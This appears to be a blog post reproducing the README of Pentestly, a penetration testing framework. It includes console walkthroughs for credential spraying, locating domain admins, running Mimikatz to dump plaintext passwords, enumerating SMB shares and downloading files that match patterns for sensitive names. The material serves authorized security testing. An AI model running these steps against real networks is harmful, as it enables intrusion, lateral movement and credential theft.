Pentestly: A Python and Powershell Internal Penetration Testing Framework Tool
Pentestly is a tool for penetration tests. It is a combination of expanding Python tools.
The main aim of the Pentestly tool is to utilize the familiar user interface. With the power of Python, the contribution to the framework should be easy. Pentestly utilizes the power of Python, Powershell etc tools together in a familiar user experience.
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:
recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
wmiexec.py - Allows us to execute Powershell commands quickly and easily via WMI
smbmap.py - Useful utility for enumerating SMB shares
Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
powercat.ps1 - Netcat-esque functionality in Powershell
Invoke-Shellcode.ps1 - Deploy Meterpreter in Powershell
CrackMapExec - Source of inspiration for the simple Mimikatz server in Pentestly
recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
wmiexec.py - Allows us to execute Powershell commands quickly and easily via WMI
smbmap.py - Useful utility for enumerating SMB shares
Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
powercat.ps1 - Netcat-esque functionality in Powershell
Invoke-Shellcode.ps1 - Deploy Meterpreter in Powershell
CrackMapExec - Source of inspiration for the simple Mimikatz server in Pentestly
Features of Pentestly:
- mport NMAP XML
- Test SMB authentication using:
- individual credentials
- file containing credentials
- null credentials
- NTLM hash
- Test local administrator privileges for successful SMB authentication
- Identify readable SMB shares for valid credentials
- Store Domain/Enterprise Admin account names
- Determine location of running Domain Admin processes
- Determine systems of logged in Domain Admins
- Execute Powershell commands in memory and exfil results
- Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1)
- Receive a command shell (Powercat)
- Receive a meterpreter session (Invoke-Shellcode.ps1)
How you can install it:
For installation you need to follow these steps or commands:
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly
How you can use it:
Step1 [pentestly][default] > workspaces list
+------------+
| Workspaces |
+------------+
| default |
+------------+
[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project
Step 2- Load from nmap
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options
Name Current Value Required Description
-------- ------------- -------- -----------
FILENAME /root/PROJECT/full-all-alive.xml yes Path and filename for nmap XML input
[pentestly][project][nmap_xml] > run
Step 3- Test logins
For test logins use file with creds
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run
Single username & password must be used
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
Use credentials over a small subset of IPs
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'
Step 4- Domain and Enterprise admins must be Gather
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details)
[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2
Step 6-Mimikatz should be run over IPs with executable rights
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
For hosting scripts select the local interface
0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1
[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:p@$$w0rd - DOMAIN ADMIN!
Step 7- Show local admins
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run
+---------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | | nsportsman | password1! | zojix | | | True | True | login |
+---------------------------------------------------------------------------------------------------------------+
Step 8-Show domain admins
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run
+--------------------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin | TheRealDA | </l33TPassword> | zojix | | | True | True | login |
+--------------------------------------------------------------------------------------------------------------------------+
Step 9-Enumshares:
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})
Step 10-Show new shares:
[pentestly][default][interesting_files] > show pentestly_shares
+------------------------------------------------------------------------------------------------+
| rowid | host | username | readwrite | readonly | noaccess | module |
+-------------------------------------------------------------------------------------------------+
| 1 | 192.168.224.252 | Administrator | | ADMIN$,C,C$,Users | IPC$ | enumshares |
+-------------------------------------------------------------------------------------------------+
Step 11-Find/Download interesting files
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- --------- -----------
PATTERN (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$ yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Can change the pattern to something a bit more specialized
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- -------- -----------
PATTERN important.txt|super_secret yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Execute and download found files
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:[email protected]
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt
Contributing:
Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py:
from libs.pentestlymodule import PentestlyModule
class Module(PentestlyModule):
meta = {
'name': 'Your module name goes here',
'author': 'Developer name goes here',
'description': 'Description of the module goes here',
'query': 'SQL QUERY whose result is passed to your module',
'options': (
('Option1', 'Default Value', Required-True/False, 'Description of option'),
),
}
def module_pre(self):
# Optional
# Happens before your module
def module_run(self, data):
# Required
# data is the result from the SQL query set in the options
### Few magic functions
# self.query - Perform an SQL query on the internal database
results = self.query("select * from pentestly_creds")
# self.output - print default information to the user
self.output("Performed an SQL query")
self.output(results)
# self.alert - print the successful message to the user
self.success("Yay! We performed successful work")
def module_post(self):
# Optional
# Happens after your module
TODO
- Implement secretsdump.py module
- Add utility functions for database queries similar to creds, services
- Rework draw_table function to have fixed width columns
- Import credentials from Gladius
- Implement GPP password search and decrypt module
- Look into utilizing Invoke-Shellcode
0 comments:
Post a Comment
Note: only a member of this blog may post a comment.